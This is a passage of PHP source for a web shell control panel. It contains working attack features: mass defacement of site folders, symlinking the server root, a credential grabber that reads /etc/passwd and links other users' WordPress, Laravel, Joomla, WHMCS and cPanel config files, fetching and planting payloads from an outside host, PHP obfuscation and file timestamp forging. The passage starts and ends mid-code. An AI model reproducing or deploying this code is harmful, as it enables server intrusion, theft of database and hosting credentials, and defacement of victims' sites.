<input type="radio" id="mass-def-2" name="mass_type" value="mahal" class="hidden peer"> <label for="mass-def-2" class="inline-flex items-center justify-between w-full p-5 text-gray-500 bg-white border border-gray-200 rounded-lg cursor-pointer dark:hover:text-gray-300 dark:border-gray-700 dark:peer-checked:text-blue-500 peer-checked:border-blue-600 dark:peer-checked:border-blue-600 peer-checked:text-blue-600 hover:text-gray-600 hover:bg-gray-100 dark:text-gray-400 dark:bg-gray-800 dark:hover:bg-gray-700"> <div class="block"> <div class="w-full text-lg font-semibold">MASS</div> <div class="w-full">Mass upload to all folders exists</div> </div> <svg class="w-5 h-5 ms-3 rtl:rotate-180" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 14 10"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 5h12m0 0L9 1m4 4L9 9" /> </svg> </label> </li> </ul> <div class="mb-4"> <label for="file_name" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">File Name:</label> <input type="text" id="file_name" name="file_name" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder="index.html" required> </div> <div class="mb-4"> <label for="file_content" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">File Content:</label> <textarea id="file_content" name="file_content" rows="12" class="block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder="<h1>Hacked by ...</h1>" required></textarea> </div> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="massdeface"> Execute </button> </form> <?php } } if (isset($_GET["action"]) && $_GET["action"] === "b64decode") { ?> <form method="post" action=""> <div class='mt-4'> <label for="b64decode" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">Base64 Encoded:</label> <textarea id="b64decode" name="b64decode" rows="12" class="block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required><?php echo (isset($_POST["b64decode"])) ? htmlspecialchars($_POST["b64decode"]) : ""; ?></textarea> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="decode"> Decode </button> </div> </form> <?php if (isset($_POST["decode"])) { $b64decode = $_POST["b64decode"]; if (empty($b64decode)) { echo "<font color='red'>Input is empty</font>"; } else { $decoded = base64_decode($b64decode); if ($decoded === false) { echo "<font color='red'>Invalid Base64 string</font>"; } else { ?> <div class='mt-4 mb-3 text-gray-700 dark:text-gray-300'> <strong>Decoded Output:</strong> <textarea id="copyTarget" rows='12' class='block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500' readonly><?= htmlspecialchars($decoded); ?></textarea> <button id="copyBtn" class="block mt-3 mx-auto text-blue-700 hover:text-white border border-blue-700 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:border-blue-500 dark:text-blue-500 dark:hover:text-white dark:hover:bg-blue-500 dark:focus:ring-blue-800 cursor-pointer" onclick="copyToClipboard()">Copy to Clipboard</button> </div> <?php } } } } if (isset($_GET["action"]) && $_GET["action"] === "b64encode") { ?> <form method="post" action=""> <div class='mt-4'> <label for="b64dencode" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">Strings To Encode:</label> <textarea id="b64dencode" name="b64dencode" rows="12" class="block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required><?php echo (isset($_POST["b64dencode"])) ? htmlspecialchars($_POST["b64dencode"]) : ""; ?></textarea> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="decode"> Encode </button> </div> </form> <?php if (isset($_POST["decode"])) { $b64dencode = $_POST["b64dencode"]; if (empty($b64dencode)) { echo "<font color='red'>Input is empty</font>"; } else { $decoded = base64_encode($b64dencode); if ($decoded === false) { echo "<font color='red'>Invalid Base64 string</font>"; } else { ?> <div class='mt-4 mb-3 text-gray-700 dark:text-gray-300'> <strong>Encoded Output:</strong> <textarea id="copyTarget" rows='12' class='block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500' readonly><?= htmlspecialchars($decoded); ?></textarea> <button id="copyBtn" class="block mt-3 mx-auto text-blue-700 hover:text-white border border-blue-700 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:border-blue-500 dark:text-blue-500 dark:hover:text-white dark:hover:bg-blue-500 dark:focus:ring-blue-800 cursor-pointer" onclick="copyToClipboard()">Copy to Clipboard</button> </div> <?php } } } } if (isset($_GET["action"]) && $_GET["action"] === "symvhosts") { ?> <form action="" method="post"> <div class='mt-4'> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="createsymvhost"> Start Symlink Vhosts </button> </div> </form> <?php if (isset($_POST["createsymvhost"])) { system('ln -s / naxc_vhosts.txt'); $b64htacs = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw'; $write = error_log(base64_decode($b64htacs), 3, $path . "/.htaccess"); $naxc_vhosts = symlink("/", "naxc_vhosts.txt"); ?> <div class='mt-4 mb-3 text-center text-gray-700 dark:text-gray-300'> <strong>Symlink Created:</strong> <a href="naxc_vhosts.txt" target="_blank" class="text-blue-600 hover:underline">naxc_vhosts.txt</a> </div> <?php } } if (isset($_GET["action"]) && $_GET["action"] === "sym403") { ?> <form action="" method="post"> <div class='mt-4'> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="createsym403"> Spawn Symlink 403 </button> </div> </form> <?php if (isset($_POST["createsym403"])) { error_log(requests("https://fcalpha.net/web/photo/20151024/bypass/e-sym403.txt"), 3, $path . "/sym403.php"); $admloc = $path . "/sym403.php"; $result = str_replace($_SERVER['DOCUMENT_ROOT'], $web . "", $admloc); flash("success", "Symlink 403 Spawned Successfully!", null, $result); } } if (isset($_GET["action"]) && $_GET["action"] === "grabconfig") { ini_set('max_execution_time', 0); @ini_set('display_errors', 0); @ini_set('file_uploads', 1); ?> <form class="mt-4" method="post" action=""> <label for="passwd" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">List of users:</label> <textarea name="passwd" rows="15" class="block p-2.5 w-full mb-3 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder="one user per line" required><?php $uSr = file("/etc/passwd"); foreach ($uSr as $usrr) { $str = explode(":", $usrr); echo $str[0] . "\n"; } ?></textarea> <input type="hidden" class="input" name="folfig" value="naxc_config" /> <label for="grabtype" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Select type</label> <select id="grabtype" name="grabtype" class="bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500"> <option title="type txt" value=".txt" selected>.txt</option> <option title="type php" value=".php">.php</option> <option title="type shtml" value=".shtml">.shtml</option> <option title="type ini" value=".ini">.ini</option> <option title="type html" value=".html">.html</option> </select> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="conf"> Execute </button> </form> <?php } if (isset($_POST['conf'])) { $v = "var"; $folfig = $_POST['folfig']; $type = $_POST['grabtype']; @mkdir($folfig, 0755); @chdir($folfig); $confhtacs = "T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCAubXkuY25mDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRUeXBlIHR4dCAubXkuY25mDQpBZGRUeXBlIHR4dCAuYWNjZXNzaGFzaA0KQWRkSGFuZGxlciB0eHQgLnBocA0KQWRkSGFuZGxlciB0eHQgLmNuZg0KQWRkSGFuZGxlciB0eHQgLmFjY2Vzc2hhc2g="; error_log(base64_decode($confhtacs), 3, $path . "/" . $folfig . "/.htaccess"); $passwd = explode("\n", $_POST["passwd"]); foreach ($passwd as $pwd) { $user = trim($pwd); symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vBulletin1.txt'); symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-vBulletin3.txt'); symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vBulletin4.txt'); symlink('/home/' . $user . '/public_html/config.php', $user . '-Phpbb1.txt'); symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-Wp1.txt'); symlink('/home/' . $user . '/htdocs/wp-config.php', $user . '-Wp-htdocs.txt'); symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-Wp2.txt'); symlink('/home/' . $user . '/public_html/web/wp-config.php', $user . '-Wp3.txt'); symlink('/home1/' . $user . '/public_html/wp-config.php', $user . '-WpHm1.txt'); symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-WpHm2.txt'); symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-WpHm3.txt'); symlink('/var/www/html/wp-config.php', $v . '-wp1.txt'); symlink('/home/' . $user . '/public_html/.env', $user . '-Laravel1.txt'); symlink('/home/' . $user . '/public_html/web/.env', $user . '-Laravel2.txt'); symlink('/home/' . $user . '/public_html/public/.env', $user . '-Laravel3.txt'); symlink('/var/www/html/.env', $v . '-LaravelV.txt'); symlink('/home/' . $user . '/public_html/configuration.php', $user . '-Joomla1.txt'); symlink('/home/' . $user . '/public_html/html/configuration.php', $user . '-Joomla2.txt'); symlink('/home/' . $user . '/public_html/web/configuration.php', $user . '-Joomla3.txt'); symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-Whm1.txt'); symlink('/home/' . $user . '/public_html/whmc/configuration.php', $user . '-Whm2.txt'); symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-Whm3.txt'); symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-Whm4.txt'); symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-Whm5.txt'); symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-Whm6.txt'); symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-Whm7.txt'); symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-Whm8.txt'); symlink('/home/' . $user . '/public_html/order/configuration.php', $user . '-Whm9.txt'); symlink('/home/' . $user . '/public_html/app/etc/local.xml', $user . '-Magento.txt'); symlink('/home/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt'); symlink('/home/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter.txt'); symlink('/home/' . $user . '/public_html/web/application/config/database.php', $user . '-CodeIgniterH.txt'); symlink('/home1/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter1.txt'); symlink('/home2/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter2.txt'); symlink('/home3/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter3.txt'); symlink('/home/' . $user . '/.my.cnf', $user . '-cpanel.txt'); symlink('/home/' . $user . '/.accesshash', $user . '-whm.txt'); symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-opencart.txt'); symlink('/home/' . $user . '/public_html/app/etc/local.xml', $user . '-mangento.txt'); } ?> <div class='mt-4 mb-3 text-center text-gray-700 dark:text-gray-300'> <strong>Check Here:</strong> <a href="<?= $folfig; ?>" target="_blank" class="text-blue-600 hover:underline"><?= $folfig; ?></a> </div> <?php } if (isset($_GET["action"]) && $_GET["action"] === "changedate") { $itemPath = $path . "/" . $_GET["item"]; ?> <form method="post" action=""> <div class='mt-4'> <label for="new_date" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">Edit Date</label> <input type="text" id="new_date" name="new_date" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?= filedate($itemPath); ?>" required> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="changedate"> Change Date </button> </div> </form> <?php if (isset($_POST["changedate"])) { $new_date = $_POST["new_date"]; if (chdate($itemPath, $new_date)) { flash("success", "Date changed successfully!"); } else { flash("error", "Failed to change date!"); } } } if (isset($_GET["action"]) && $_GET["action"] === "adminer") { ?> <form action="" method="post"> <div class='mt-4'> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="createadminer"> Spawn Adminer </button> </div> </form> <?php if (isset($_POST["createadminer"])) { error_log(requests("https://fcalpha.net/web/photo/20151024/bypass/e-adm.txt"), 3, $path . "/adm.php"); $admloc = $path . "/adm.php"; $result = str_replace($_SERVER['DOCUMENT_ROOT'], $web . "", $admloc); flash("success", "Adminer Spawned Successfully!", $result); } } /* END TOOLS */ /* FILE ACTIONS */ if (isset($_GET["path"]) && @$_GET["action"] === "newfile") { ?> <form id="handle_file" method="post" action=""> <div class='mt-4'> <div class="mb-4"> <label for="file_name" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">New File Name:</label> <input type="text" id="file_name" name="file_name" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required> </div> <div class="mb-4"> <label for="new_file_content" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">File Content:</label> <textarea id="new_file_content" name="new_file_content" rows="12" class="block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500"></textarea> </div> <hr class="my-8 border-gray-200 dark:border-gray-700" /> <p class="mb-3 font-bold"> Bypass Options </p> <div class="flex flex-col lg:flex-row lg:items-center gap-x-4"> <div class="mb-4 w-full lg:w-1/2"> <label for="new_file_method" class="block mb-2.5 text-sm font-medium text-gray-900 dark:text-white">Select edit method</label> <select id="new_file_method" name="new_file_method" onchange="showInfo()" class="bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500"> <option value="basic">Using basic write file</option> <option value="cmd">Using command</option> </select> <div class="hidden" id="infoMethod"> <div class="flex items-center p-4 mb-4 text-sm text-blue-800 rounded-lg bg-blue-50 dark:bg-gray-800 dark:text-blue-400" role="alert"> <svg class="shrink-0 inline w-4 h-4 me-3" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 20 20"> <path d="M10 .5a9.5 9.5 0 1 0 9.5 9.5A9.51 9.51 0 0 0 10 .5ZM9.5 4a1.5 1.5 0 1 1 0 3 1.5 1.5 0 0 1 0-3ZM12 15H8a1 1 0 0 1 0-2h1v-3H8a1 1 0 0 1 0-2h2a1 1 0 0 1 1 1v4h1a1 1 0 0 1 0 2Z" /> </svg> <span class="sr-only">Info</span> <div> <span class="font-medium">Info!</span> If the strings too long, it will be failed to edit file (command method only). </div> </div> </div> </div> <div class="mb-4 w-full lg:w-1/2"> <p class="block mb-2.5 text-sm font-medium text-gray-900 dark:text-white">Obfuscate PHP:</p> <div class="flex gap-x-4"> <div class="flex w-1/2 items-center ps-4 cursor-pointer dark:bg-gray-700 rounded-lg"> <input checked id="no-obfuscate" type="radio" value="no-obfuscate" name="obfuscate" class="w-4 h-4 text-neutral-primary border-default-medium bg-neutral-secondary-medium rounded-full checked:border-brand focus:ring-2 focus:outline-none focus:ring-brand-subtle border border-2 appearance-none checked:border-blue-600 checked:border-4 checked:bg-white"> <label for="no-obfuscate" class="w-full py-3 select-none ms-2 text-sm font-medium text-heading">No Obfuscate</label> </div> <div class="flex w-1/2 items-center ps-4 cursor-pointer dark:bg-gray-700 rounded-lg"> <input id="yes-obfuscate" type="radio" value="yes-obfuscate" name="obfuscate" class="w-4 h-4 text-neutral-primary border-default-medium bg-neutral-secondary-medium rounded-full checked:border-brand focus:ring-2 focus:outline-none focus:ring-brand-subtle border border-2 appearance-none checked:border-blue-600 checked:border-4 checked:bg-white"> <label for="yes-obfuscate" class="w-full py-3 select-none ms-2 text-sm font-medium text-heading">Obfuscate</label> </div> </div> </div> </div> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="newfile"> Create file </button> </div> </form> <?php if (isset($_POST["newfile"])) { $filename = $_POST["file_name"]; $content = $_POST["new_file_content"]; $method = $_POST["new_file_method"]; if (isset($_POST["obfuscate"]) && $_POST["obfuscate"] === "yes-obfuscate") { $content = "<?php " . php_obfuscator(base64_decode($content)) . " ?>"; } else { $content = base64_decode($content); } if (file_editor($path, $filename, $content, $method)) { flash("success", "File created successfully!", $path . $toPage, "?path=$path&file=" . str_replace(".temporary", "", $filename) . "&action=edit&search=$search"); exit; } else { flash("error", "Failed to create file!"); } } } if (isset($_GET["action"]) && $_GET["action"] === "view" && isset($_GET["file"])) { $filePath = $path . "/" . $_GET["file"]; if (file_exists($filePath) && is_file($filePath)) { // Capture file output ob_start(); readfile($filePath); $fileContent = ob_get_clean(); ?> <div class="mt-4 text-gray-700 dark:text-gray-300"> <h2 class="text-lg font-semibold"> File Content: <code><?= htmlspecialchars($_GET["file"]); ?></code> </h2> <?php $fileExt = pathinfo($filePath, PATHINFO_EXTENSION); $imageExtensions = ["jpg", "jpeg", "png", "gif", "bmp", "webp", "svg", "ico"]; if (in_array(strtolower($fileExt), $imageExtensions)) { $mimeType = mime_content_type($filePath); $base64 = base64_encode(file_get_contents($filePath)); ?> <div class="flex items-center content-center p-5 w-full h-auto max-h-[300px] text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white focus:outline-none"> <img src="data:<?= $mimeType; ?>;base64,<?= $base64; ?>" alt="Image" class="w-full max-w-[350px] h-auto max-h-[270px] rounded-lg shadow-md mx-auto"> </div> <?php } else { ?> <textarea rows="12" class="block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white focus:outline-none" readonly><?= htmlspecialchars($fileContent); ?></textarea> <?php } ?> </div> <div class="flex gap-x-2 mt-2"> <a class="hover:text-gray-600 dark:hover:text-gray-500" href="?path=<?= $path; ?>&file=<?= $file; ?>&action=edit<?= $toPage ?>">Edit</a> <button onclick="postDownload('<?= addslashes($filePath) ?>')"> <span class="hover:text-gray-600 dark:hover:text-gray-500">Download</span> </button> <a class="hover:text-gray-600 dark:hover:text-gray-500" href="?path=<?= $path; ?>&file=<?= $file; ?>&action=unzip<?= $toPage ?>">Unzip</a> <a class="hover:text-gray-600 dark:hover:text-gray-500" href="?path=<?= $path; ?>&file=<?= $file; ?>&action=chmodfile<?= $toPage ?>">Chmod</a> <a class="hover:text-gray-600 dark:hover:text-gray-500" href="?path=<?= $path; ?>&file=<?= $file; ?>&action=deletefile<?= $toPage ?>">Delete</a> </div> <?php } else { ?> <div class='mt-4 text-red-600 font-medium font-medium'>File does not exist or is not readable.</div> <?php } } if (isset($_GET["action"]) && $_GET["action"] === "edit" && isset($_GET["file"])) { $filePath = $path . "/" . $_GET["file"]; if (file_exists($filePath) && is_file($filePath) && is_writable($filePath)) { ob_start(); readfile($filePath); $fileContent = ob_get_clean(); ?> <form id="handle_file" method="post" action=""> <div class='mt-4'> <div class="mb-4"> <label for="file_name" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">File Name:</label> <input type="text" id="file_name" name="file_name" value="<?= $file; ?>" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required> </div> <div class="mb-4"> <textarea name="edit_file_content" rows="12" class='block p-2.5 w-full text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white focus:outline-none'><?= htmlspecialchars($fileContent); ?></textarea> </div> <hr class="my-8 border-gray-200 dark:border-gray-700" /> <p class="mb-3 font-bold"> Bypass Options </p> <div class="flex flex-col lg:flex-row lg:items-center gap-x-4"> <div class="mb-4 w-full lg:w-1/2"> <label for="edit_file_method" class="block mb-2.5 text-sm font-medium text-gray-900 dark:text-white">Select edit method</label> <select id="edit_file_method" name="edit_file_method" onchange="showInfo()" class="bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500"> <option value="basic">Using basic write file</option> <option value="cmd">Using command</option> </select> <div class="hidden" id="infoMethod"> <div class="flex items-center p-4 mb-4 text-sm text-blue-800 rounded-lg bg-blue-50 dark:bg-gray-800 dark:text-blue-400" role="alert"> <svg class="shrink-0 inline w-4 h-4 me-3" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 20 20"> <path d="M10 .5a9.5 9.5 0 1 0 9.5 9.5A9.51 9.51 0 0 0 10 .5ZM9.5 4a1.5 1.5 0 1 1 0 3 1.5 1.5 0 0 1 0-3ZM12 15H8a1 1 0 0 1 0-2h1v-3H8a1 1 0 0 1 0-2h2a1 1 0 0 1 1 1v4h1a1 1 0 0 1 0 2Z" /> </svg> <span class="sr-only">Info</span> <div> <span class="font-medium">Info!</span> If the strings too long, it will be failed to edit file (command method only). </div> </div> </div> </div> <div class="mb-4 w-full lg:w-1/2"> <p class="block mb-2.5 text-sm font-medium text-gray-900 dark:text-white">Obfuscate PHP:</p> <div class="flex gap-x-4"> <div class="flex w-1/2 items-center ps-4 cursor-pointer dark:bg-gray-700 rounded-lg"> <input checked id="no-obfuscate" type="radio" value="no-obfuscate" name="obfuscate" class="w-4 h-4 text-neutral-primary border-default-medium bg-neutral-secondary-medium rounded-full checked:border-brand focus:ring-2 focus:outline-none focus:ring-brand-subtle border border-2 appearance-none checked:border-blue-600 checked:border-4 checked:bg-white"> <label for="no-obfuscate" class="w-full py-3 select-none ms-2 text-sm font-medium text-heading">No Obfuscate</label> </div> <div class="flex w-1/2 items-center ps-4 cursor-pointer dark:bg-gray-700 rounded-lg"> <input id="yes-obfuscate" type="radio" value="yes-obfuscate" name="obfuscate" class="w-4 h-4 text-neutral-primary border-default-medium bg-neutral-secondary-medium rounded-full checked:border-brand focus:ring-2 focus:outline-none focus:ring-brand-subtle border border-2 appearance-none checked:border-blue-600 checked:border-4 checked:bg-white"> <label for="yes-obfuscate" class="w-full py-3 select-none ms-2 text-sm font-medium text-heading">Obfuscate</label> </div> </div> </div> </div> <button class="block w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="editfile"> Save Changes </button> </div> </form> <?php if (isset($_POST["editfile"])) { $filename = $_POST['file_name']; $content = $_POST["edit_file_content"]; $method = $_POST["edit_file_method"]; if (isset($_POST['obfuscate']) && $_POST['obfuscate'] === 'yes-obfuscate') { $content = "<?php " . php_obfuscator(base64_decode($content)) . " ?>"; } else { $content = base64_decode($content); } if (file_editor($path, $filename, $content, $method)) { if ($filename == $file) { flash("success", "File updated successfully!", $path . "&file=" . str_replace(".temporary", "", $file) . "&action=edit" . $toPage); } else { flash("success", "File updated successfully!", $path . "&file=" . str_replace(".temporary", "", $filename) . "&action=edit" . $toPage); } exit; } else { flash("error", "Failed to update file!"); } } } else { ?> <div class='mt-4 text-red-600 font-medium'>File does not exist or is not writable.</div> <?php } } if (isset($_GET["action"]) && $_GET["action"] === "chmodfile" && isset($_GET["file"])) { $filePath = $path . "/" . $file; if (file_exists($filePath) && is_file($filePath)) { ?> <form method="post" action=""> <div class='mt-4'> <h2 class='text-lg font-semibold'>Chmod File: <code><?= htmlspecialchars($file); ?></code></h2> <input type="text" name="new_perms" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?= substr(sprintf('%o', @fileperms($filePath)), -4); ?>" required> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="chmodfile"> Change Permission </button> </div> </form> <?php if (isset($_POST["chmodfile"])) { $newPerms = intval($_POST["new_perms"], 8); if (chmod($filePath, $newPerms)) { flash("success", "Successfully changed permission!", $path . "&file=" . $file . "&action=chmodfile" . $toPage); } else { flash("error", "Failed to changed permission!"); } } } else { ?> <div class='mt-4 text-red-600 font-medium'>File does not exist or is not writable.</div> <?php } } if (isset($_GET["action"]) && $_GET["action"] === "deletefile" && isset($_GET["file"])) { $filePath = $path . "/" . $file; if (file_exists($filePath) && is_file($filePath) && is_writable($filePath)) { if (unlink($filePath)) { flash("success", "File deleted successfully!", $path . $toPage); } else { flash("error", "Failed to delete file!"); } } else { echo "<div class='mt-4 text-red-600 font-medium'>File does not exist or is not writable.</div>"; } } if (isset($_POST['download'])) { $file = base64_decode($_POST['download']); if 